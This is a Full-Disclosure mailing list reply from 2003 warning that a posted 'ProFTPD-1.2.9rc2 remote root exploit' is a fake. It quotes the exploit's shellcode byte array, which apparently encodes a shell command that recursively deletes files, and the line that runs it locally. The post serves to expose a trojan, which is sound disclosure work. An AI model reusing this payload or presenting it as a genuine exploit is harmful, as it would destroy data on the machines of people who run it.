Full Disclosure mailing list archives
Re: ProFTPD-1.2.9rc2 remote root exploit
From: Robert Jaroszuk <zim () iq pl>
Date: Fri, 24 Oct 2003 16:20:40 +0200
On Fri, 24 Oct 2003, Andreas Gietl wrote: ; On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote: ; ; this seems to delete sth on the local harddisk. anybody else seeing this ; effect? Yea, something like that. /* x86 bind shellcode */ char sc[]= "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d" "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41" "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f" "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44" "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24" "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14" "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0" "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"; [ cut ] /* connect to the bindshell */ printf("Trying to connect, please wait...\n"); void(*sleep)()=(void*)sc;sleep(5); This exploit tries to run shellcode on local machine. Probably smth evil in this shellcode: -- ..... Robert Jaroszuk - zim@iq,pl - [ IQ PL Sp. z o.o. ] ..... GCS/IT/O d? s: a-- C++ ULB++++$ P+ L++++$ E--- W- N+ w-- O- M- V- PS+ PE Y(+) PGP-(+++) t-- 5? X- R* tv-- DI++ b++>+++ DI- D- ... The superior warrior wins without fighting -- Sun Tzu. ... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- ProFTPD-1.2.9rc2 remote root exploit Jean-Kevin Grosnakeur (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Valdis . Kletnieks (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Andreas Gietl (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Robert Jaroszuk (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Andreas Gietl (Oct 24)
- Re[2]: ProFTPD-1.2.9rc2 remote root exploit Wine (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Lorenzo Hernandez Garcia-Hierro (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Robert Jaroszuk (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Simon Kirby (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit qobaiashi (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit upb (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Jedi/Sector One (Oct 24)
- Re: ProFTPD-1.2.9rc2 localhost delete kang (Oct 24)
- Re: ProFTPD-1.2.9rc2 localhost delete dilema (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Cael Abal (Oct 24)